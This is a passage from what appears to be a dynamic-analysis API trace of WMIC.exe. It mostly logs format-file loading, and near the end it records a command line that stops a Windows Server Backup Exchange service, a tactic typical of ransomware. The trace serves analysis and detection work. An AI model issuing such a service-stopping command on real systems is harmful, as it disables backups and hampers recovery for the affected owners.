(param_1="MOF") returned 0x3 [0311.960] SysStringLen (param_1="RAWXML") returned 0x6 [0311.960] SysStringLen (param_1="LIST") returned 0x4 [0311.960] SysStringLen (param_1="MOF") returned 0x3 [0311.960] malloc (_Size=0x18) returned 0x34c2a00 [0311.960] IUnknown:Release (This=0x3586b88) returned 0x0 [0311.960] IUnknown:Release (This=0x3589fa8) returned 0x0 [0311.960] IUnknown:Release (This=0x3589ff8) returned 0x0 [0311.960] IXMLDOMNodeList:get_item (in: This=0x3589ca0, index=8, listItem=0x32bfb50 | out: listItem=0x32bfb50*=0x3586b88) returned 0x0 [0311.961] IXMLDOMNode:get_text (in: This=0x3586b88, text=0x32bfb54 | out: text=0x32bfb54*="csv.xsl") returned 0x0 [0311.961] IXMLDOMNode:get_attributes (in: This=0x3586b88, attributeMap=0x32bfb4c | out: attributeMap=0x32bfb4c*=0x3589fa8) returned 0x0 [0311.961] malloc (_Size=0xc) returned 0x34c9820 [0311.961] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3589fa8, name="KEYWORD", namedItem=0x32bfb48 | out: namedItem=0x32bfb48*=0x3589ff8) returned 0x0 [0311.961] free (_Block=0x34c9820) [0311.961] IXMLDOMNode:get_nodeValue (in: This=0x3589ff8, value=0x32bfb08 | out: value=0x32bfb08*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSV", varVal2=0x0)) returned 0x0 [0311.961] malloc (_Size=0xc) returned 0x34c9820 [0311.961] malloc (_Size=0xc) returned 0x34c9838 [0311.961] SysStringLen (param_1="CSV") returned 0x3 [0311.961] SysStringLen (param_1="TABLE") returned 0x5 [0311.961] SysStringLen (param_1="CSV") returned 0x3 [0311.961] SysStringLen (param_1="LIST") returned 0x4 [0311.961] SysStringLen (param_1="CSV") returned 0x3 [0311.961] SysStringLen (param_1="HTABLE") returned 0x6 [0311.962] SysStringLen (param_1="CSV") returned 0x3 [0311.962] SysStringLen (param_1="HFORM") returned 0x5 [0311.962] malloc (_Size=0x18) returned 0x34c29a0 [0311.962] IUnknown:Release (This=0x3586b88) returned 0x0 [0311.962] IUnknown:Release (This=0x3589fa8) returned 0x0 [0311.962] IUnknown:Release (This=0x3589ff8) returned 0x0 [0311.962] IXMLDOMNodeList:get_item (in: This=0x3589ca0, index=9, listItem=0x32bfb50 | out: listItem=0x32bfb50*=0x3586b88) returned 0x0 [0311.962] IXMLDOMNode:get_text (in: This=0x3586b88, text=0x32bfb54 | out: text=0x32bfb54*="texttable.xsl") returned 0x0 [0311.962] IXMLDOMNode:get_attributes (in: This=0x3586b88, attributeMap=0x32bfb4c | out: attributeMap=0x32bfb4c*=0x3589fa8) returned 0x0 [0311.962] malloc (_Size=0xc) returned 0x34c9850 [0311.962] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3589fa8, name="KEYWORD", namedItem=0x32bfb48 | out: namedItem=0x32bfb48*=0x3589ff8) returned 0x0 [0311.963] free (_Block=0x34c9850) [0311.963] IXMLDOMNode:get_nodeValue (in: This=0x3589ff8, value=0x32bfb08 | out: value=0x32bfb08*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys.xsl", varVal2=0x0)) returned 0x0 [0311.963] malloc (_Size=0xc) returned 0x34c9850 [0311.963] malloc (_Size=0xc) returned 0x34cacd8 [0311.963] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0311.963] SysStringLen (param_1="TABLE") returned 0x5 [0311.963] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0311.963] SysStringLen (param_1="VALUE") returned 0x5 [0311.963] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0311.963] SysStringLen (param_1="XML") returned 0x3 [0311.963] SysStringLen (param_1="XML") returned 0x3 [0311.963] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0311.963] malloc (_Size=0x18) returned 0x34c2aa0 [0311.963] IUnknown:Release (This=0x3586b88) returned 0x0 [0311.963] IUnknown:Release (This=0x3589fa8) returned 0x0 [0311.963] IUnknown:Release (This=0x3589ff8) returned 0x0 [0311.963] IXMLDOMNodeList:get_item (in: This=0x3589ca0, index=10, listItem=0x32bfb50 | out: listItem=0x32bfb50*=0x3586b88) returned 0x0 [0311.964] IXMLDOMNode:get_text (in: This=0x3586b88, text=0x32bfb54 | out: text=0x32bfb54*="texttable.xsl") returned 0x0 [0311.964] IXMLDOMNode:get_attributes (in: This=0x3586b88, attributeMap=0x32bfb4c | out: attributeMap=0x32bfb4c*=0x3589fa8) returned 0x0 [0311.964] malloc (_Size=0xc) returned 0x34cad08 [0311.964] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3589fa8, name="KEYWORD", namedItem=0x32bfb48 | out: namedItem=0x32bfb48*=0x3589ff8) returned 0x0 [0311.964] free (_Block=0x34cad08) [0311.964] IXMLDOMNode:get_nodeValue (in: This=0x3589ff8, value=0x32bfb08 | out: value=0x32bfb08*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys", varVal2=0x0)) returned 0x0 [0311.964] malloc (_Size=0xc) returned 0x34cac60 [0311.964] malloc (_Size=0xc) returned 0x34cad80 [0311.964] SysStringLen (param_1="texttablewsys") returned 0xd [0311.964] SysStringLen (param_1="TABLE") returned 0x5 [0311.964] SysStringLen (param_1="texttablewsys") returned 0xd [0311.964] SysStringLen (param_1="XML") returned 0x3 [0311.965] SysStringLen (param_1="texttablewsys") returned 0xd [0311.965] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0311.965] SysStringLen (param_1="XML") returned 0x3 [0311.965] SysStringLen (param_1="texttablewsys") returned 0xd [0311.965] malloc (_Size=0x18) returned 0x34c2b20 [0311.965] IUnknown:Release (This=0x3586b88) returned 0x0 [0311.965] IUnknown:Release (This=0x3589fa8) returned 0x0 [0311.965] IUnknown:Release (This=0x3589ff8) returned 0x0 [0311.965] IXMLDOMNodeList:get_item (in: This=0x3589ca0, index=11, listItem=0x32bfb50 | out: listItem=0x32bfb50*=0x3586b88) returned 0x0 [0311.965] IXMLDOMNode:get_text (in: This=0x3586b88, text=0x32bfb54 | out: text=0x32bfb54*="texttable.xsl") returned 0x0 [0311.965] IXMLDOMNode:get_attributes (in: This=0x3586b88, attributeMap=0x32bfb4c | out: attributeMap=0x32bfb4c*=0x3589fa8) returned 0x0 [0311.965] malloc (_Size=0xc) returned 0x34cabe8 [0311.966] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3589fa8, name="KEYWORD", namedItem=0x32bfb48 | out: namedItem=0x32bfb48*=0x3589ff8) returned 0x0 [0311.967] free (_Block=0x34cabe8) [0311.967] IXMLDOMNode:get_nodeValue (in: This=0x3589ff8, value=0x32bfb08 | out: value=0x32bfb08*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat.xsl", varVal2=0x0)) returned 0x0 [0311.967] malloc (_Size=0xc) returned 0x34cabd0 [0311.967] malloc (_Size=0xc) returned 0x34cadf8 [0311.967] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0311.967] SysStringLen (param_1="TABLE") returned 0x5 [0311.967] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0311.967] SysStringLen (param_1="XML") returned 0x3 [0311.967] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0311.967] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0311.967] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0311.967] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0311.967] malloc (_Size=0x18) returned 0x34c2b60 [0311.967] IUnknown:Release (This=0x3586b88) returned 0x0 [0311.967] IUnknown:Release (This=0x3589fa8) returned 0x0 [0311.967] IUnknown:Release (This=0x3589ff8) returned 0x0 [0311.968] IXMLDOMNodeList:get_item (in: This=0x3589ca0, index=12, listItem=0x32bfb50 | out: listItem=0x32bfb50*=0x3586b88) returned 0x0 [0311.968] IXMLDOMNode:get_text (in: This=0x3586b88, text=0x32bfb54 | out: text=0x32bfb54*="texttable.xsl") returned 0x0 [0311.968] IXMLDOMNode:get_attributes (in: This=0x3586b88, attributeMap=0x32bfb4c | out: attributeMap=0x32bfb4c*=0x3589fa8) returned 0x0 [0311.968] malloc (_Size=0xc) returned 0x34cab10 [0311.968] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3589fa8, name="KEYWORD", namedItem=0x32bfb48 | out: namedItem=0x32bfb48*=0x3589ff8) returned 0x0 [0311.968] free (_Block=0x34cab10) [0311.968] IXMLDOMNode:get_nodeValue (in: This=0x3589ff8, value=0x32bfb08 | out: value=0x32bfb08*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat", varVal2=0x0)) returned 0x0 [0311.968] malloc (_Size=0xc) returned 0x34cac78 [0311.968] malloc (_Size=0xc) returned 0x34cacf0 [0311.969] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0311.969] SysStringLen (param_1="TABLE") returned 0x5 [0311.969] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0311.969] SysStringLen (param_1="XML") returned 0x3 [0311.969] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0311.969] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0311.969] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0311.969] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0311.969] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0311.969] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0311.969] malloc (_Size=0x18) returned 0x34c2ce0 [0311.969] IUnknown:Release (This=0x3586b88) returned 0x0 [0311.969] IUnknown:Release (This=0x3589fa8) returned 0x0 [0311.969] IUnknown:Release (This=0x3589ff8) returned 0x0 [0311.969] IXMLDOMNodeList:get_item (in: This=0x3589ca0, index=13, listItem=0x32bfb50 | out: listItem=0x32bfb50*=0x3586b88) returned 0x0 [0311.969] IXMLDOMNode:get_text (in: This=0x3586b88, text=0x32bfb54 | out: text=0x32bfb54*="texttable.xsl") returned 0x0 [0311.969] IXMLDOMNode:get_attributes (in: This=0x3586b88, attributeMap=0x32bfb4c | out: attributeMap=0x32bfb4c*=0x3589fa8) returned 0x0 [0311.970] malloc (_Size=0xc) returned 0x34cac90 [0311.970] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3589fa8, name="KEYWORD", namedItem=0x32bfb48 | out: namedItem=0x32bfb48*=0x3589ff8) returned 0x0 [0311.970] free (_Block=0x34cac90) [0311.970] IXMLDOMNode:get_nodeValue (in: This=0x3589ff8, value=0x32bfb08 | out: value=0x32bfb08*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys.xsl", varVal2=0x0)) returned 0x0 [0311.970] malloc (_Size=0xc) returned 0x34cab70 [0311.970] malloc (_Size=0xc) returned 0x34cac90 [0311.970] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0311.970] SysStringLen (param_1="TABLE") returned 0x5 [0311.970] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0311.970] SysStringLen (param_1="XML") returned 0x3 [0311.970] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0311.970] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0311.970] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0311.970] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0311.970] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0311.970] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0311.970] malloc (_Size=0x18) returned 0x34c2a40 [0311.971] IUnknown:Release (This=0x3586b88) returned 0x0 [0311.971] IUnknown:Release (This=0x3589fa8) returned 0x0 [0311.971] IUnknown:Release (This=0x3589ff8) returned 0x0 [0311.971] IXMLDOMNodeList:get_item (in: This=0x3589ca0, index=14, listItem=0x32bfb50 | out: listItem=0x32bfb50*=0x3586b88) returned 0x0 [0311.971] IXMLDOMNode:get_text (in: This=0x3586b88, text=0x32bfb54 | out: text=0x32bfb54*="texttable.xsl") returned 0x0 [0311.971] IXMLDOMNode:get_attributes (in: This=0x3586b88, attributeMap=0x32bfb4c | out: attributeMap=0x32bfb4c*=0x3589fa8) returned 0x0 [0311.971] malloc (_Size=0xc) returned 0x34cade0 [0311.971] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3589fa8, name="KEYWORD", namedItem=0x32bfb48 | out: namedItem=0x32bfb48*=0x3589ff8) returned 0x0 [0311.971] free (_Block=0x34cade0) [0311.972] IXMLDOMNode:get_nodeValue (in: This=0x3589ff8, value=0x32bfb08 | out: value=0x32bfb08*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys", varVal2=0x0)) returned 0x0 [0311.972] malloc (_Size=0xc) returned 0x34cab28 [0311.972] malloc (_Size=0xc) returned 0x34cade0 [0311.972] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0311.972] SysStringLen (param_1="TABLE") returned 0x5 [0311.972] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0311.972] SysStringLen (param_1="XML") returned 0x3 [0311.972] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0311.972] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0311.972] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0311.972] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0311.972] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0311.972] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0311.972] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0311.972] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0311.972] malloc (_Size=0x18) returned 0x34c2ac0 [0311.972] IUnknown:Release (This=0x3586b88) returned 0x0 [0311.972] IUnknown:Release (This=0x3589fa8) returned 0x0 [0311.972] IUnknown:Release (This=0x3589ff8) returned 0x0 [0311.972] IXMLDOMNodeList:get_item (in: This=0x3589ca0, index=15, listItem=0x32bfb50 | out: listItem=0x32bfb50*=0x3586b88) returned 0x0 [0311.973] IXMLDOMNode:get_text (in: This=0x3586b88, text=0x32bfb54 | out: text=0x32bfb54*="htable.xsl") returned 0x0 [0311.973] IXMLDOMNode:get_attributes (in: This=0x3586b88, attributeMap=0x32bfb4c | out: attributeMap=0x32bfb4c*=0x3589fa8) returned 0x0 [0311.973] malloc (_Size=0xc) returned 0x34cabe8 [0311.973] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3589fa8, name="KEYWORD", namedItem=0x32bfb48 | out: namedItem=0x32bfb48*=0x3589ff8) returned 0x0 [0311.973] free (_Block=0x34cabe8) [0311.973] IXMLDOMNode:get_nodeValue (in: This=0x3589ff8, value=0x32bfb08 | out: value=0x32bfb08*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby.xsl", varVal2=0x0)) returned 0x0 [0311.973] malloc (_Size=0xc) returned 0x34cad98 [0311.973] malloc (_Size=0xc) returned 0x34cabe8 [0311.973] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0311.973] SysStringLen (param_1="TABLE") returned 0x5 [0311.973] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0311.973] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0311.973] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0311.973] SysStringLen (param_1="XML") returned 0x3 [0311.974] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0311.974] SysStringLen (param_1="texttablewsys") returned 0xd [0311.974] SysStringLen (param_1="XML") returned 0x3 [0311.974] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0311.974] malloc (_Size=0x18) returned 0x34c2b80 [0311.974] IUnknown:Release (This=0x3586b88) returned 0x0 [0311.974] IUnknown:Release (This=0x3589fa8) returned 0x0 [0311.974] IUnknown:Release (This=0x3589ff8) returned 0x0 [0311.974] IXMLDOMNodeList:get_item (in: This=0x3589ca0, index=16, listItem=0x32bfb50 | out: listItem=0x32bfb50*=0x3586b88) returned 0x0 [0311.974] IXMLDOMNode:get_text (in: This=0x3586b88, text=0x32bfb54 | out: text=0x32bfb54*="htable.xsl") returned 0x0 [0311.974] IXMLDOMNode:get_attributes (in: This=0x3586b88, attributeMap=0x32bfb4c | out: attributeMap=0x32bfb4c*=0x3589fa8) returned 0x0 [0311.974] malloc (_Size=0xc) returned 0x34cab58 [0311.974] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3589fa8, name="KEYWORD", namedItem=0x32bfb48 | out: namedItem=0x32bfb48*=0x3589ff8) returned 0x0 [0311.975] free (_Block=0x34cab58) [0311.975] IXMLDOMNode:get_nodeValue (in: This=0x3589ff8, value=0x32bfb08 | out: value=0x32bfb08*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby", varVal2=0x0)) returned 0x0 [0311.975] malloc (_Size=0xc) returned 0x34cad20 [0311.975] malloc (_Size=0xc) returned 0x34cad68 [0311.975] SysStringLen (param_1="htable-sortby") returned 0xd [0311.975] SysStringLen (param_1="TABLE") returned 0x5 [0311.975] SysStringLen (param_1="htable-sortby") returned 0xd [0311.975] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0311.975] SysStringLen (param_1="htable-sortby") returned 0xd [0311.975] SysStringLen (param_1="XML") returned 0x3 [0311.975] SysStringLen (param_1="htable-sortby") returned 0xd [0311.975] SysStringLen (param_1="texttablewsys") returned 0xd [0311.975] SysStringLen (param_1="htable-sortby") returned 0xd [0311.975] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0311.975] SysStringLen (param_1="XML") returned 0x3 [0311.975] SysStringLen (param_1="htable-sortby") returned 0xd [0311.975] malloc (_Size=0x18) returned 0x34c2c00 [0311.975] IUnknown:Release (This=0x3586b88) returned 0x0 [0311.976] IUnknown:Release (This=0x3589fa8) returned 0x0 [0311.976] IUnknown:Release (This=0x3589ff8) returned 0x0 [0311.976] IXMLDOMNodeList:get_item (in: This=0x3589ca0, index=17, listItem=0x32bfb50 | out: listItem=0x32bfb50*=0x3586b88) returned 0x0 [0311.976] IXMLDOMNode:get_text (in: This=0x3586b88, text=0x32bfb54 | out: text=0x32bfb54*="mof.xsl") returned 0x0 [0311.976] IXMLDOMNode:get_attributes (in: This=0x3586b88, attributeMap=0x32bfb4c | out: attributeMap=0x32bfb4c*=0x3589fa8) returned 0x0 [0311.976] malloc (_Size=0xc) returned 0x34cab40 [0311.976] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3589fa8, name="KEYWORD", namedItem=0x32bfb48 | out: namedItem=0x32bfb48*=0x3589ff8) returned 0x0 [0311.976] free (_Block=0x34cab40) [0311.976] IXMLDOMNode:get_nodeValue (in: This=0x3589ff8, value=0x32bfb08 | out: value=0x32bfb08*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat.xsl", varVal2=0x0)) returned 0x0 [0311.976] malloc (_Size=0xc) returned 0x34cad38 [0311.976] malloc (_Size=0xc) returned 0x34cad50 [0311.977] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0311.977] SysStringLen (param_1="TABLE") returned 0x5 [0311.977] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0311.977] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0311.977] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0311.977] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0311.977] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0311.977] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0311.977] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0311.977] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0311.977] malloc (_Size=0x18) returned 0x34c2ae0 [0311.977] IUnknown:Release (This=0x3586b88) returned 0x0 [0311.977] IUnknown:Release (This=0x3589fa8) returned 0x0 [0311.977] IUnknown:Release (This=0x3589ff8) returned 0x0 [0311.977] IXMLDOMNodeList:get_item (in: This=0x3589ca0, index=18, listItem=0x32bfb50 | out: listItem=0x32bfb50*=0x3586b88) returned 0x0 [0311.977] IXMLDOMNode:get_text (in: This=0x3586b88, text=0x32bfb54 | out: text=0x32bfb54*="mof.xsl") returned 0x0 [0311.977] IXMLDOMNode:get_attributes (in: This=0x3586b88, attributeMap=0x32bfb4c | out: attributeMap=0x32bfb4c*=0x3589fa8) returned 0x0 [0311.978] malloc (_Size=0xc) returned 0x34cab40 [0311.978] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3589fa8, name="KEYWORD", namedItem=0x32bfb48 | out: namedItem=0x32bfb48*=0x3589ff8) returned 0x0 [0311.978] free (_Block=0x34cab40) [0311.978] IXMLDOMNode:get_nodeValue (in: This=0x3589ff8, value=0x32bfb08 | out: value=0x32bfb08*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat", varVal2=0x0)) returned 0x0 [0311.978] malloc (_Size=0xc) returned 0x34caba0 [0311.978] malloc (_Size=0xc) returned 0x34cadc8 [0311.978] SysStringLen (param_1="wmiclimofformat") returned 0xf [0311.978] SysStringLen (param_1="TABLE") returned 0x5 [0311.978] SysStringLen (param_1="wmiclimofformat") returned 0xf [0311.978] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0311.978] SysStringLen (param_1="wmiclimofformat") returned 0xf [0311.978] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0311.978] SysStringLen (param_1="wmiclimofformat") returned 0xf [0311.978] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0311.978] SysStringLen (param_1="wmiclimofformat") returned 0xf [0311.978] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0311.978] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0311.979] SysStringLen (param_1="wmiclimofformat") returned 0xf [0311.979] malloc (_Size=0x18) returned 0x34c2d20 [0311.979] IUnknown:Release (This=0x3586b88) returned 0x0 [0311.979] IUnknown:Release (This=0x3589fa8) returned 0x0 [0311.979] IUnknown:Release (This=0x3589ff8) returned 0x0 [0311.979] IXMLDOMNodeList:get_item (in: This=0x3589ca0, index=19, listItem=0x32bfb50 | out: listItem=0x32bfb50*=0x3586b88) returned 0x0 [0311.979] IXMLDOMNode:get_text (in: This=0x3586b88, text=0x32bfb54 | out: text=0x32bfb54*="textvaluelist.xsl") returned 0x0 [0311.979] IXMLDOMNode:get_attributes (in: This=0x3586b88, attributeMap=0x32bfb4c | out: attributeMap=0x32bfb4c*=0x3589fa8) returned 0x0 [0311.979] malloc (_Size=0xc) returned 0x34cad08 [0311.979] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3589fa8, name="KEYWORD", namedItem=0x32bfb48 | out: namedItem=0x32bfb48*=0x3589ff8) returned 0x0 [0311.979] free (_Block=0x34cad08) [0311.980] IXMLDOMNode:get_nodeValue (in: This=0x3589ff8, value=0x32bfb08 | out: value=0x32bfb08*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat.xsl", varVal2=0x0)) returned 0x0 [0311.980] malloc (_Size=0xc) returned 0x34caca8 [0311.980] malloc (_Size=0xc) returned 0x34cac00 [0311.980] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0311.980] SysStringLen (param_1="TABLE") returned 0x5 [0311.980] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0311.980] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0311.980] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0311.980] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0311.980] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0311.980] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0311.980] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0311.980] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0311.980] malloc (_Size=0x18) returned 0x34c2bc0 [0311.980] IUnknown:Release (This=0x3586b88) returned 0x0 [0311.980] IUnknown:Release (This=0x3589fa8) returned 0x0 [0311.980] IUnknown:Release (This=0x3589ff8) returned 0x0 [0311.980] IXMLDOMNodeList:get_item (in: This=0x3589ca0, index=20, listItem=0x32bfb50 | out: listItem=0x32bfb50*=0x3586b88) returned 0x0 [0311.981] IXMLDOMNode:get_text (in: This=0x3586b88, text=0x32bfb54 | out: text=0x32bfb54*="textvaluelist.xsl") returned 0x0 [0311.981] IXMLDOMNode:get_attributes (in: This=0x3586b88, attributeMap=0x32bfb4c | out: attributeMap=0x32bfb4c*=0x3589fa8) returned 0x0 [0311.981] malloc (_Size=0xc) returned 0x34cad08 [0311.981] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3589fa8, name="KEYWORD", namedItem=0x32bfb48 | out: namedItem=0x32bfb48*=0x3589ff8) returned 0x0 [0311.982] free (_Block=0x34cad08) [0311.982] IXMLDOMNode:get_nodeValue (in: This=0x3589ff8, value=0x32bfb08 | out: value=0x32bfb08*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat", varVal2=0x0)) returned 0x0 [0311.982] malloc (_Size=0xc) returned 0x34cacc0 [0311.982] malloc (_Size=0xc) returned 0x34cadb0 [0311.982] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0311.982] SysStringLen (param_1="TABLE") returned 0x5 [0311.982] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0311.982] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0311.982] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0311.982] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0311.982] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0311.982] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0311.982] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0311.982] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0311.982] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0311.982] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0311.982] malloc (_Size=0x18) returned 0x34c2c40 [0311.982] IUnknown:Release (This=0x3586b88) returned 0x0 [0311.982] IUnknown:Release (This=0x3589fa8) returned 0x0 [0311.983] IUnknown:Release (This=0x3589ff8) returned 0x0 [0311.983] IUnknown:Release (This=0x3589ca0) returned 0x0 [0311.983] FreeThreadedDOMDocument:IUnknown:Release (This=0x3586b48) returned 0x1 [0311.983] FreeThreadedDOMDocument:IUnknown:Release (This=0x35845a8) returned 0x0 [0311.983] free (_Block=0x34c9880) [0311.983] GetCommandLineW () returned="\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%wsbexchange%%'\" call stopservice" [0311.983] malloc (_Size=0xe0) returned 0x34caee8 [0311.983] memcpy_s (in: _Destination=0x34caee8, _DestinationSize=0xde, _Source=0x35a1b78, _SourceSize=0xd6 | out: _Destination=0x34caee8) returned 0x0 [0311.983] malloc (_Size=0xc) returned 0x34cab40 [0311.983] malloc (_Size=0xc) returned 0x34cab10 [0311.983] malloc (_Size=0xc) returned 0x34cab58 [0311.983] malloc (_Size=0xc) returned 0x34cac48 [0311.984] malloc (_Size=0x80) returned 0x34cafd0 [0311.984] GetLocalTime (in: lpSystemTime=0x32bfaec | out: lpSystemTime=0x32bfaec*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x2, wHour=0x8, wMinute=0x1d, wSecond=0x12, wMilliseconds=0x26)) [0311.984] _vsnwprintf (in: _Buffer=0x34cafd0, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x32bfacc | out: _Buffer="04-02-2020T08:29:18") returned 19 [0311.984] lstrlenW (lpString=" path Win32_Service where \"name like '%%wsbexchange%%'\" call stopservice") returned 72 [0311.984] malloc (_Size=0x92) returned 0x34cb058 [0311.984] lstrlenW (lpString=" path Win32_Service where \"name like '%%wsbexchange%%'\" call stopservice") returned 72 [0311.984] lstrlenW (lpString=" path Win32_Service where \"name like '%%wsbexchange%%'\" call stopservice") returned 72 [0311.984] malloc (_Size=0x92) returned 0x34cb0f8 [0311.984] lstrlenW (lpString=" path Win32_Service where \"name like '%%wsbexchange%%'\" call stopservice") returned 72 [0311.984] lstrlenW (lpString=" path Win32_Service where \"name like '%%wsbexchange%%'\" call stopservice") returned 72 [0311.984] lstrlenW (lpString=" path Win32_Service where \"name like '%%wsbexchange%%'\" call stopservice") returned 72 [0311.984] malloc (_Size=0xa) returned 0x34cab88 [0311.984] lstrlenW (lpString="path") returned 4 [0311.984] _wcsicmp (_String1="path", _String2="\"NULL\"") returned 78 [0311.984] malloc (_Size=0xa) returned 0x34cabb8 [0311.984] malloc (_Size=0x4) returned 0x34c2ee8 [0311.984] free (_Block=0x0) [0311.984] free (_Block=0x34cab88) [0311.984] lstrlenW (lpString=" path Win32_Service where \"name like '%%wsbexchange%%'\" call stopservice") returned 72 [0311.984] malloc (_Size=0x1c) returned 0x34c9da8 [0311.984] lstrlenW (lpString="Win32_Service") returned 13 [0311.984] _wcsicmp (_String1="Win32_Service", _String2="\"NULL\"") returned 85 [0311.984] malloc (_Size=0x1c) returned 0x34c0568 [0311.985] malloc (_Size=0x8) returned 0x34c0590 [0311.985] memmove_s (in: _Destination=0x34c0590, 